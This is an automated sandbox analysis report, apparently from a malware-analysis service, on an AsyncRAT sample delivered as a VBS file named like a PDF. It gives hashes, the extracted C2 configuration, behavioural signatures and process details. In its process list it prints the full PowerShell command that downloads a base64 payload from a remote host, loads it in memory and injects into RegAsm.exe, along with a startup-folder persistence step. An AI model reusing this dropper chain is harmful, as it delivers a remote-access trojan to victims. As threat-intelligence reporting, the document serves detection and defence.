asyncrat | 84f101fd1efbadf4f287849ae8dc6f09729f1741143b7465a4233599b9865624

General

Target

TWEASOPKSA_002_PDF.vbs
Size

238KB
MD5

b757fcf7a0df8528178bf586a3d718ae
SHA1

65394437dbbc8405b0a4b5c5e87bd1668f644d09
SHA256

84f101fd1efbadf4f287849ae8dc6f09729f1741143b7465a4233599b9865624
SHA512

908a583130bec368503d3a5ca62b7432d45910bc9adabd96da5310e38d5691a2c9bb9f71114c8a1270bf133d5324dec0afa819817fc85768d6c5cecaa9340119
SSDEEP

48:sK0mjzlXJj5NzzBWsoMtssbs0Qs+PM/sq6OkZ9s3XEHDzzAA:sKDF9n0JMtswebE0DAsDoA

Score

10^/10

asyncrat default rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://contadoreshbc.com/dll_startup

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

ehjay2022.duckdns.org:6739

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/4316-138-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral2/memory/4316-139-0x000000000040C73E-mapping.dmp	asyncrat

Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

5 520 powershell.exe
14 520 powershell.exe
18 520 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation WScript.exe
Drops startup file 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk powershell.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 520 set thread context of 4316 520 powershell.exe RegAsm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

520 powershell.exe
520 powershell.exe
4948 powershell.exe
4948 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exeRegAsm.exe

description pid process

Token: SeDebugPrivilege 520 powershell.exe
Token: SeDebugPrivilege 4948 powershell.exe
Token: SeDebugPrivilege 4316 RegAsm.exe

flow	pid	process
5	520	powershell.exe
14	520	powershell.exe
18	520	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	WScript.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk	powershell.exe

description	pid	process	target process
PID 520 set thread context of 4316	520	powershell.exe	RegAsm.exe

pid	process
520	powershell.exe
520	powershell.exe
4948	powershell.exe
4948	powershell.exe

description	pid	process
Token: SeDebugPrivilege	520	powershell.exe
Token: SeDebugPrivilege	4948	powershell.exe
Token: SeDebugPrivilege	4316	RegAsm.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

WScript.exepowershell.exe

description	pid	process	target process
PID 4648 wrote to memory of 520	4648	WScript.exe	powershell.exe
PID 4648 wrote to memory of 520	4648	WScript.exe	powershell.exe
PID 520 wrote to memory of 4948	520	powershell.exe	powershell.exe
PID 520 wrote to memory of 4948	520	powershell.exe	powershell.exe
PID 520 wrote to memory of 4316	520	powershell.exe	RegAsm.exe
PID 520 wrote to memory of 4316	520	powershell.exe	RegAsm.exe
PID 520 wrote to memory of 4316	520	powershell.exe	RegAsm.exe
PID 520 wrote to memory of 4316	520	powershell.exe	RegAsm.exe
PID 520 wrote to memory of 4316	520	powershell.exe	RegAsm.exe
PID 520 wrote to memory of 4316	520	powershell.exe	RegAsm.exe
PID 520 wrote to memory of 4316	520	powershell.exe	RegAsm.exe
PID 520 wrote to memory of 4316	520	powershell.exe	RegAsm.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TWEASOPKSA_002_PDF.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4648

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('https://contadoreshbc.com/dll_startup'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('88b1f890dee4-f24b-d954-356b-7478a862=nekot&aidem=tla?txt.FDP_200_ASKPOSAEWT/o/moc.topsppa.b3638-fhwen/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))
2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:520

C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Done.vbs
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4948

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4316

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
24cd57a8710ead89af77751cc4ce3236

SHA1
d66a76341ec9d1f53adc3caedfbc2a78e1055a30

SHA256
ca494d00a7aba63fc4cf7c49316bccee057616a26b917f9f12692b36b1f1dd91

SHA512
903577e4d3cd91d47dbd9f4f49c48236aef013c12ed36dc8a338c23845680b709af7e5272c21f036ea88c7b6ca10d090eb2cede1d836557d8ea37d071358223f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
0305a7668f2e3675e1e22d509f88ed5a

SHA1
95bc70dc1ae5c795fcc4f9581de41ef4f83e0b4d

SHA256
9ab67c9ef2f57eaff6903d45c295716412ab4f87f656034c33389c648c89582d

SHA512
32155e5a7bb2a4faebf504eb399799765173671d9097c2e61bc789e1852235013de7f9efbfc107b686e21d0af01dca22083a5f3a8c477323eda7456daf209743

Download Submit
memory/520-132-0x0000000000000000-mapping.dmp

Download
memory/520-133-0x0000016E3B6F0000-0x0000016E3B712000-memory.dmp

Filesize
136KB

Download
memory/520-134-0x00007FFA02680000-0x00007FFA03141000-memory.dmp

Filesize
10.8MB

Download
memory/520-142-0x00007FFA02680000-0x00007FFA03141000-memory.dmp

Filesize
10.8MB

Download
memory/4316-138-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4316-139-0x000000000040C73E-mapping.dmp

Download
memory/4316-143-0x0000000006080000-0x000000000611C000-memory.dmp

Filesize
624KB

Download
memory/4316-144-0x00000000066D0000-0x0000000006C74000-memory.dmp

Filesize
5.6MB

Download
memory/4316-145-0x0000000005DC0000-0x0000000005E26000-memory.dmp

Filesize
408KB

Download
memory/4948-137-0x00007FFA02680000-0x00007FFA03141000-memory.dmp

Filesize
10.8MB

Download
memory/4948-136-0x00007FFA02680000-0x00007FFA03141000-memory.dmp

Filesize
10.8MB

Download
memory/4948-135-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads